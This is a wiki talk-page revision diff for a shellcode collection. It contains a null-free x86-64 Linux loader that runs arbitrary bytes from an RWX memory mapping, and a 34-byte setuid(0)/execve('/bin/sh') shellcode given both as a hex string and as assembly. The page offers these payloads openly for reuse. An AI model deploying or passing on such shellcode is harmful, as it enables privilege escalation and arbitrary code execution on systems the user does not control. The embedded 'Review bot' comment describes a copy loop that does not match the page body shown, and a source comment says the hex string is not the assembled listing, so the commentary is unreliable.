
Difference between revisions of "Category talk:Shellcode"

(Shellcode loader)
(Shellcode loader)
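--- a/Category_talk:Shellcode
+++ b/Category_talk:Shellcode
@@ -63,2 +63,4 @@
 inject_finished:
+inc %rsi
+movb $0xc3, (%rax, %rsi, 1)
  call *%rax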
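Review bot: The new `inc %rsi` at inject_finished moves the `ret` one byte past the string terminator, so what executes after the payload is the byte pair `00 c3` (which decodes as `add %al,%bl`) followed by whatever sits beyond it, rather than a `ret`. The loop that reaches this label is outside the hunk; in the page body below it is `mov (%rbx,%rsi,1), %r10` / `mov %r10, (%rax,%rsi,1)`, an 8-byte copy that also drags up to seven bytes past the NUL into the mapping, so the bytes after the intended `ret` are not guaranteed to be zero. On exit from the loop %rsi already indexes the terminator's slot, so dropping the `inc` and writing `movb $0xc3, (%rax, %rsi, 1)` directly puts the `ret` where the NUL is; narrowing the copy to `movb (%rbx,%rsi,1), %r10b` / `movb %r10b, (%rax,%rsi,1)` would keep the over-read out of the mapping as well.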
  

Revision as of 21:37, 2 September 2012

Hey guys, I thought we could use a collection of this material for re-use. Let's only contribute things we wrote ourselves — no copy-pasting others' code, please! Hatter 05:23, 19 August 2012 (MSK)

Collections

This page needs shellcodes and will be updated with them shortly.

Thanks for your patience.

Windows

Linux

64-bit

Shellcode loader

This loader is not meant to be used as a buffer-overflow payload itself, but it is null-free just in case. It targets 64-bit Linux (kernel 3.x) systems.

Usage:

  as inject.s -o inject.o ; ld inject.o -o inject
  ./inject "$(echo -en "\x90\x90\x90")"   
  • The above example will execute three no-ops.
 
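.section .data
.section .text
.globl _start

#-----------------------------------------------------------------------
# _start: copy argv[1] into a fresh RWX anonymous mapping, append a
#         `ret` right after it, call it, then exit(0).
# ABI:    Linux x86-64 raw syscalls (args in rdi, rsi, rdx, r10, r8, r9;
#         syscall clobbers rcx, r11; result in rax, -errno on failure).
# Regs:   rbx = argv[1] (source bytes), rax = mapping base,
#         rsi = byte index while copying, dil = 0 (terminator compare).
# Notes:  kept free of 0x00 bytes: immediates via push/pop, short jumps
#         only.  A single argv string is bounded by the kernel's
#         per-argument limit, assumed to fit the 256 KiB mapping — TODO confirm.
#         Exit status: 0 after the payload returns, 1 if there is no
#         argument or mmap fails.
#-----------------------------------------------------------------------
_start:
 pop %rbx                 # argc
 pop %rbx                 # argv[0]
 pop %rbx                 # argv[1]: the bytes to run (NULL when absent)
 test %rbx, %rbx
 jz fail                  # no payload argument: exit(1) instead of reading NULL

 # mmap(NULL, 0x40000, PROT_READ|PROT_WRITE|PROT_EXEC,
 #      MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
 push $0x9
 pop %rax                 # SYS_mmap
 xor %rdi, %rdi           # addr = NULL
 push %rdi
 pop %rsi
 inc %rsi
 shl $0x12, %rsi          # len = 1 << 18 (256 KiB)
 push $0x7
 pop %rdx                 # prot = RWX
 push $0x22
 pop %r10                 # flags = MAP_PRIVATE|MAP_ANONYMOUS (r10, not rcx, for syscalls)
 push %rdi
 push %rdi
 pop %r8                  # fd = 0 (ignored for anonymous mappings on Linux)
 pop %r9                  # offset = 0
 syscall
 cmp $-4095, %rax         # rax in [-4095,-1] means -errno
 jae fail

begin_inject:
 xor %rsi, %rsi           # rsi = 0: byte index into both buffers
 push %rsi
 pop %rdi                 # dil = 0: the terminator we stop at

inject_loop:
 cmpb %dil, (%rbx, %rsi, 1)
 je inject_finished       # stop at the NUL that ends argv[1]
 movb (%rbx, %rsi, 1), %r10b
 movb %r10b, (%rax, %rsi, 1)   # one byte at a time: no over-read past the NUL
 inc %rsi
 jmp inject_loop

inject_finished:
 # rsi indexes the terminator's slot in the zero-filled mapping, so the
 # ret lands directly after the last payload byte with no stray 0x00.
 movb $0xc3, (%rax, %rsi, 1)   # ret
 call *%rax                # run the payload; comes back only if it reaches the ret
 xor %rdi, %rdi           # status 0

exit:
 push $60
 pop %rax                 # SYS_exit
 syscall

fail:
 push $0x1
 pop %rdi                 # status 1
 jmp exit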
 
setuid(0); execve('/bin/sh'); - 34 bytes

Hatter 05:27, 19 August 2012 (MSK)

  • \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
 
.section .data
.section .text
.globl _start
# setuid(0) followed by execve("/bin/sh", argv, envp) on Linux x86-64.
# This is the readable source; the 34-byte hex string above is a
# different, null-free instruction sequence, not the assembled output
# of this listing.
_start:
 mov $0, %rdi     # uid = 0
 mov $105, %rax   # SYS_setuid
 syscall
 
# Linux syscall arguments are passed in %rdi, %rsi, %rdx (then %r10, %r8, %r9)
 mov $59, %rax    # SYS_execve
                 # execve(filename=%rdi, argv=%rsi, envp=%rdx)
 push $0x00       # one 8-byte zero on the stack: an empty, NULL-terminated pointer array
 mov %rsp, %rdx   # envp -> that empty array
 mov %rsp, %rsi   # argv -> the same empty array
 mov $0x0068732f6e69622f, %rcx   # "/bin/sh\0", little-endian
 push %rcx
 mov %rsp, %rdi   # filename = "/bin/sh\0"
 syscall
 
 mov $60, %rax    # SYS_exit; only reached if execve failed
 mov $0, %rdi
 syscall